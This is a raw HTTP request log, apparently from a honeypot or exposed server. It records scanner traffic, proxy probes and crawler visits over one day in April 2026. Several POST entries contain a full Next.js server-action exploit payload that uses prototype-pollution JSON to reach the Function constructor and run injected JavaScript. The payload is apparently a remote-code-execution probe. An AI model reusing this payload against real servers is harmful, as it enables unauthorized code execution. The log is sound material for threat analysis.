X-Nextjs-Request-Id: poop1234
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_1533146103857
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1533146103857
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:35390
Path: /
URL: /
Method: POST
[2026-04-05 21:04:03] === HTTP Request ===
[2026-04-05 19:50:35] Main page accessed - IP: 205.210.31.93:57123
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.93:57123
Path: /
URL: /
Method: GET
[2026-04-05 19:50:35] === HTTP Request ===
===================
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37038
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-05 18:22:58] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:38358
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-05 17:42:51] === HTTP Request ===
[2026-04-05 17:18:53] Main page accessed - IP: 172.30.0.12:37016
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.18.186.238
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37016
Path: /
URL: /
Method: GET
[2026-04-05 17:18:53] === HTTP Request ===
===================
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/login
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Priority: u=1, i
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
X-Forwarded-For: 195.222.172.34
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36412
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-05 16:30:18] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.132
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/plain,text/html,*/*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51728
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-05 15:47:31] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.172.182
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55720
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-05 15:42:56] === HTTP Request ===
[2026-04-05 15:42:55] Main page accessed - IP: 172.30.0.12:55720
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.172.182
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55720
Path: /
URL: /
Method: GET
[2026-04-05 15:42:55] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.54:59586
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-04-05 14:41:13] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "Linux"
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 147.182.228.80:46978
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-05 13:59:42] === HTTP Request ===
[2026-04-05 13:59:41] Main page accessed - IP: 147.182.228.80:46974
===================
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Linux"
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Connection: keep-alive
Sec-Fetch-User: ?1
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Gpc: 1
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 147.182.228.80:46974
Path: /
URL: /
Method: GET
[2026-04-05 13:59:41] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:60108
Path: /jars
URL: /jars
Method: GET
[2026-04-05 13:02:19] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.241.183
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34284
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-05 12:29:42] === HTTP Request ===
[2026-04-05 12:29:42] Main page accessed - IP: 172.30.0.12:34284
===================
X-Openai-Host-Hash: 867116608
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.48
Via: 2.0 Caddy
From: gptbot(at)openai.com
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34284
Path: /
URL: /
Method: GET
[2026-04-05 12:29:42] === HTTP Request ===
[2026-04-05 11:48:04] Main page accessed - IP: 66.132.186.194:6516
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.194:6516
Path: /
URL: /
Method: GET
[2026-04-05 11:48:04] === HTTP Request ===
[2026-04-05 11:41:46] Main page accessed - IP: 35.233.40.58:32788
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.233.40.58:32788
Path: /
URL: /
Method: GET
[2026-04-05 11:41:46] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.148.2:15534
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-04-05 11:35:37] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 141.98.10.164:31604
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-05 10:49:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 141.98.10.164:31588
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-05 10:49:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 141.98.10.164:31580
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-05 10:49:58] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: example.com:443
RemoteAddr: 176.65.134.34:35254
Path:
URL: //example.com:443
Method: CONNECT
[2026-04-05 10:04:53] === HTTP Request ===
[2026-04-05 09:31:08] Main page accessed - IP: 176.65.149.45:35038
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:35038
Path: /
URL: /
Method: GET
[2026-04-05 09:31:08] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.49:50470
Path: /ext-js/app/common/zld_product_spec.js
URL: /ext-js/app/common/zld_product_spec.js
Method: GET
[2026-04-05 09:18:14] === HTTP Request ===
[2026-04-05 09:17:37] Main page accessed - IP: 45.156.128.49:55312
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.49:55312
Path: /
URL: /
Method: GET
[2026-04-05 09:17:37] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 203.55.131.5:44696
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-05 08:05:57] === HTTP Request ===
[2026-04-05 08:05:22] Main page accessed - IP: 203.55.131.5:42834
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 203.55.131.5:42834
Path: /
URL: /
Method: GET
[2026-04-05 08:05:22] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.157:41805
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-05 06:45:37] === HTTP Request ===
[2026-04-05 06:42:18] Main page accessed - IP: 91.196.152.63:37993
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.63:37993
Path: /
URL: /
Method: GET
[2026-04-05 06:42:18] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:15624
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-05 06:20:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:48418
Path: /jars
URL: /jars
Method: GET
[2026-04-05 05:30:15] === HTTP Request ===
===================
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.244:50651
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-05 04:34:19] === HTTP Request ===
[2026-04-05 04:31:47] Main page accessed - IP: 91.230.168.245:60423
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.245:60423
Path: /
URL: /
Method: GET
[2026-04-05 04:31:47] === HTTP Request ===
===================
------WebKitFormBoundaryx9865939963--
------WebKitFormBoundaryx9865939963
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx9865939963
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 9102+true+1083931;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx9865939963
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx9865939963
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_9865939963
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Length: 508
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:40908
Path: /api/route
URL: /api/route
Method: POST
[2026-04-05 04:29:57] === HTTP Request ===
===================
------WebKitFormBoundaryx148808033293--
------WebKitFormBoundaryx148808033293
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx148808033293
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 222906+true+667582;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx148808033293
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx148808033293
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_148808033293
Next-Action: x
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:40892
Path: /app
URL: /app
Method: POST
[2026-04-05 04:29:56] === HTTP Request ===
===================
------WebKitFormBoundaryx107988765101--
------WebKitFormBoundaryx107988765101
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx107988765101
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 39950+true+2703098;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx107988765101
X-Nextjs-Html-Request-Id: ilovepoop_107988765101
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx107988765101
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:40888
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-05 04:29:55] === HTTP Request ===
===================
------WebKitFormBoundaryx1573906533811--
------WebKitFormBoundaryx1573906533811
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1573906533811
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 191890+true+8202129;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1573906533811
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1573906533811
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Next-Action: x
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1573906533811
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:40882
Path: /api
URL: /api
Method: POST
[2026-04-05 04:29:55] === HTTP Request ===
===================
------WebKitFormBoundaryx198789251896--
------WebKitFormBoundaryx198789251896
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx198789251896
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 33345+true+5961591;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx198789251896
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_198789251896
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx198789251896
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:40866
Path: /_next
URL: /_next
Method: POST
[2026-04-05 04:29:54] === HTTP Request ===
[2026-04-05 04:29:54] Main page accessed - IP: 45.205.1.26:42122
===================
------WebKitFormBoundaryx653745109867--
------WebKitFormBoundaryx653745109867
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx653745109867
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 253501+true+2578866;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx653745109867
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_653745109867
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx653745109867
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:42122
Path: /
URL: /
Method: POST
[2026-04-05 04:29:54] === HTTP Request ===
[2026-04-05 03:03:02] Main page accessed - IP: 207.90.244.21:39022
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.21:39022
Path: /
URL: /
Method: GET
[2026-04-05 03:03:02] === HTTP Request ===
[2026-04-05 02:42:11] Main page accessed - IP: 176.65.149.45:56158
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:56158
Path: /
URL: /
Method: GET
[2026-04-05 02:42:11] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 176.65.148.2:56166
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-04-05 01:38:19] === HTTP Request ===
===================
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Gpc: 1
Dnt: 1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Te: trailers
Sec-Fetch-Site: cross-site
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:36038
Path: /login/sellers.json
URL: /login/sellers.json
Method: GET
[2026-04-05 00:51:39] === HTTP Request ===
===================
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: script
Dnt: 1
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Te: trailers
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:36028
Path: /login/app-ads.txt
URL: /login/app-ads.txt
Method: GET
[2026-04-05 00:51:39] === HTTP Request ===
===================
Te: trailers
Sec-Fetch-Site: cross-site
Dnt: 1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Dest: script
Sec-Gpc: 1
Sec-Fetch-Mode: no-cors
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:36016
Path: /login/ads.txt
URL: /login/ads.txt
Method: GET
[2026-04-05 00:51:39] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Te: trailers
Sec-Fetch-Site: cross-site
Dnt: 1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:36012
Path: /login/favicon.ico
URL: /login/favicon.ico
Method: GET
[2026-04-05 00:51:38] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:58927
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-05 00:51:34] === HTTP Request ===
[2026-04-05 00:51:34] Login page accessed - IP: 51.158.203.232:58927
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:58927
Path: /login
URL: /login
Method: GET
[2026-04-05 00:51:34] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:58927
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-05 00:51:34] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.203.232:48211
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-04-05 00:51:34] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
